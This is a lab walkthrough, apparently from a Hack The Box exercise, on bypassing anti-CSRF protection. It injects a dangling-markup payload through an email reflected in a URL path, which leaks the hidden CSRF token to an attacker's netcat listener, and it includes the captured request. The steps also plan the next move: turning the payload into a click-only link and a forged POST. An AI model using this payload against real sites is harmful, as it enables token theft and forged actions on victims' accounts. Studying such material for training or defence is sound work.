WITH ANTI-CSRF TOKEN (POST METHOD)

This attack is more practical than the GET version because it does not require the attacker to sit on the victim's local network. However, the adversary still has to get past the login page — the victim must be authenticated to the target — and, because the form carries an anti-CSRF token, must first leak that token before a POST request can be forged.

#compromise/access web pages
root@oco:~$ BROWSER > {targetSite:port}
 ...
 
 * once the page has been accessed, review the source code to identify any forms (and hidden inputs such as CSRF tokens) that could be used
 
#study the source code on the site
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
 ...
 
#click the buttons to identify functions that could be vulnerable
root@oco:~$ BROWSER > {targetSite:port/app} > {Delete}
 Are you sure you want to delete your account?
 Email:
 julie.rogers@example.com
  - the email address is reflected back to the user both on the page and in the URL path (the delete endpoint takes the account email as a path segment):
     - URL: http://csrf.htb.net/app/delete/julie.rogers@example.com

#test whether the reflected email address (URL & window) is vulnerable to HTML injection
root@oco:~$ BROWSER > http://csrf.htb.net/app/delete/<h1>h1<u>underline<%2fu><%2fh1>
 Are you sure you want to delete your account?
 Email:
 h1underline
 
 * %2f is the URL encoding for /; the / of the closing tags is encoded so the whole payload stays inside one path segment instead of being split by the router
 * replace the email address with HTML to test for injection — the tags are rendered (the text comes back as a heading with underline), so the reflection is unescaped
 
#inspect the source code
root@oco:~$ BROWSER > {targetSite:port/app/delete/<h1>h1<u>underline<%2fu><%2fh1>} > CTRL + U
 <div class="subtitle" style="color: black;">Email: <div style="color: gainsboro;"><h1>h1<u>underline</u></h1></div><input name="csrf" type="hidden" value="4b2de661052d7146b2724c09ffaa1c8e998d03e2" meta-dev='testdata' 
  
 * notice that the injection point is followed by the hidden csrf input and only then by the next single quote (the meta-dev='testdata' attribute)
    - an unclosed single-quoted attribute injected here makes the browser swallow everything up to that quote, token value included — a dangling-markup injection that can be abused to leak the CSRF token to an attacker-controlled host
#craft the payload
root@oco:~$ ifconfig
 ...
 
root@oco:~$ echo "<table%20background='%2f%2f{attackerIP:port}%2f"
 <table%20background='%2f%2f{attackerIP:port}%2f

 * %2f is the URL encoding for /, so the attribute value decodes to the protocol-relative URL //{attackerIP:port}/
 * the single quote is deliberately left unclosed: the browser reads everything up to the next ' in the page as the background URL, so the hidden csrf input — token included — is appended to the request sent to the listener
 * background on <table> is a legacy attribute that makes the browser fetch the URL; the capture below is from Firefox — Chromium's dangling-markup mitigation blocks fetches whose URL contains a raw < or newline, so this variant may not fire there

#start a listener to catch the victim's outbound request (the port must match {attackerIP:port} in the payload)
root@oco:~$ nc -nlvp 8080
 ...
#expected target trigger
#assumptions and expectations
# - the target must be logged in and authenticated to the legitimate site (the leaked token is only useful together with that victim's valid session)
# - at the moment the target must paste the malicious string into the URL themselves, which is not realistic
#    - next step: embed the crafted URL in a link or page the target merely clicks (e.g. the delete link), so no manual pasting is required
# - once the token is captured it must be placed into a forged POST (e.g. an auto-submitting form on the attacker's page) while the victim's session is still valid, since the token is likely bound to it
# - expected result: the listener receives a GET whose URL-encoded path contains value="4b2de6...", i.e. the same token seen in the page source earlier

root@target:~$ BROWSER > {website} > {profile}...<table%20background='%2f%2f{attackerIP:port}%2f

root@oco:~$ nc...
 listening on [any] 8080 ...
 connect to [10.10.14.32] from (UNKNOWN) [10.10.14.32] 38598
 GET /%3C/div%3E%3Cinput%20name=%22csrf%22%20type=%22hidden%22%20value=%224b2de661052d7146b2724c09ffaa1c8e998d03e2%22%20meta-dev= HTTP/1.1
 Host: 10.10.14.32:8080
 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0
 Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://csrf.htb.net/
 DNT: 1
 Connection: keep-alive
 Sec-GPC: 1
 Priority: u=4, i
